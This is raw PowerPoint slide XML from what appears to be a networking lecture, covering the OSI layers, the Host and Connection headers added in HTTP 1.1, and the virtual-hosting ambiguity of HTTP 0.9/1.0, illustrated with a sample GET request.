        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3637961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7772B5-4CC0-0FC1-FB2E-23CEBE704A64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP 0.9/1.0 versus 1.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC3AB66A-5667-F0E8-5DF2-A3424B05533F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{283B9EA5-CE9A-4950-A80C-5ADF06B45BB8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23C90836-8C35-D2DC-664B-8616EF31EC38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two new headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Communicates the domain name that the client is contacting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Optional (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>but omit it at your own risk!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Asks the server to leave the TCP socket open after responding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enables multiple requests/responses per socket</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="216923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Layer</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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4662985" y="1600200"/>
            <a:ext cx="5852614" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Whatever you want :)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Whatever you want :D</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Whatever you want ;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples: turn on your smartphone and look at the list of apps</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1708492" y="2088137"/>
            <a:ext cx="2258720" cy="573177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1681070" y="2088137"/>
            <a:ext cx="2231550"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Application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1697252" y="2663625"/>
            <a:ext cx="2269960" cy="573177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00206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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669694" y="2663625"/>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fontScale="925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Presentation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1697383" y="3236802"/>
            <a:ext cx="2269960" cy="573177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C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2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669825" y="3236802"/>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Session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1697383" y="3809979"/>
            <a:ext cx="2269960" cy="573177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669825" y="3809979"/>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Transport</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1697383" y="4383156"/>
            <a:ext cx="2269960" cy="573177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D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a:xfrm>
            <a:off x="1669825" y="4383156"/>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Network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1697383" y="4960890"/>
            <a:ext cx="2269960" cy="573177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3"/>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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669825" y="4960890"/>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Data Link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1697514" y="5534067"/>
            <a:ext cx="2269960" cy="573177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF000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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669956" y="5534067"/>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Physical</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Left Brace 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4103426" y="1842448"/>
            <a:ext cx="559559" cy="4653886"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2" fmla="val 11414"/>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43478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5FBB-C868-E5E8-ED17-E0AA8F09AD7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ambiguity in HTTP 0.9/1.0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EEA6CA2-B3E8-9192-BD8C-CE73072A9E8C}"/>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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{556997B0-F5B5-5A80-5D6E-D607747984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5853" y="3811725"/>
            <a:ext cx="1005227" cy="1005227"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D0A7719-523B-8DD6-A063-37C4044CB18D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="895251" y="4591942"/>
            <a:ext cx="2637876" cy="3686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http://www.reddit.com/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2D8D0C4-F724-7FE1-1272-69EFCCC874A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2815011" y="4314338"/>
            <a:ext cx="237456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EC2F0CF-880B-73E7-CF74-C695586FD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952" y="3867615"/>
            <a:ext cx="893446" cy="893446"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Arrow Connector 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDD068AF-9BA3-FAF1-A8E5-B76EEFA884AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6332977" y="4329347"/>
            <a:ext cx="177693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A73E2364-FE49-4706-20BE-D766261F8C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0874" y="3870626"/>
            <a:ext cx="943966" cy="9463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7C1156D-AB9D-5BC5-89CF-AF00F1DE8F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5853" y="5238178"/>
            <a:ext cx="1005227" cy="1005227"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F609CE78-FE6E-3571-82A1-F313F0E91B33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="895251" y="6018395"/>
            <a:ext cx="2637876" cy="3686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http://www.x.com/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1030" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63F9328F-D5F8-4AE6-D958-D01EA834D8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6818" y="5238178"/>
            <a:ext cx="1712077" cy="9463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98BAC98-8548-6869-1347-F992E143B481}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5037742" y="4846144"/>
            <a:ext cx="1575865" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>154.23.71.49</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Arrow Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86DC823D-D324-FA3D-568F-B456967A4015}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2776712" y="4529340"/>
            <a:ext cx="2412867" cy="12114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596630A-EED1-F176-AA90-3E5C1621E4D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6332977" y="4529340"/>
            <a:ext cx="833813" cy="3538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E13C4CC7-8CA2-A600-F8DE-00C165CDC557}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="435656" y="1623115"/>
            <a:ext cx="5331429" cy="1916616"/>
            <a:chOff x="1656452" y="1632515"/>
            <a:chExt cx="5331429" cy="1916616"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Speech Bubble: Rectangle 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C49B0AA-82A2-D581-3AAD-194EBA9C563E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1656452" y="1632515"/>
              <a:ext cx="5331429" cy="1916616"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -20019"/>
                <a:gd name="adj2" fmla="val 649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
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{852C7D9D-646C-11D9-F635-15CA1E9ACDD7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1715852" y="1746256"/>
              <a:ext cx="380658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solidFill>
                  <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>GET /index.html HTTP/0.9</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Text Placeholder 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66F71F08-A7B0-6FAD-73FA-46C6DB44EB74}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1715853" y="2055036"/>
              <a:ext cx="5114044"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solidFill>
                  <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Accept: text/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>html,application</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>xhtml+xml</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Text Placeholder 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43ACBFAF-71FA-28D0-0715-1F6EF3EC6DD4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1715852" y="2393659"/>
              <a:ext cx="5272029"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solidFill>
                  <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>User-Agent: Mozilla/5.0 Chrome/125.0.3323.51</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Text Placeholder 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22124F32-8C0E-B807-CB25-440CC643D37B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1715853" y="2756311"/>
              <a:ext cx="5181068"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solidFill>
                  <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Accept-Encoding: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>gzip,deflate,sdch</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Text Placeholder 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4C27D38-A3D1-B8F7-0AF0-473EA8F96222}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1715853" y="3106449"/>
              <a:ext cx="5237250"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solidFill>
                  <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Accept-Language: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>en-US,en;q</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=0.8</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52B6820D-F60E-4370-6942-DB0F1BBBD4AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7143298" y="4360410"/>
            <a:ext cx="540533" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Speech Bubble: Rectangle 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87B5175F-9011-5F28-3B22-6335CA2E11EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6817306" y="2533319"/>
            <a:ext cx="2479892" cy="947912"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -27783"/>
              <a:gd name="adj2" fmla="val 149874"/>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Which /index.html are the clients requesting?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="86138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randombar(horizontal)">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randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="5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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500" fill="hold"/>
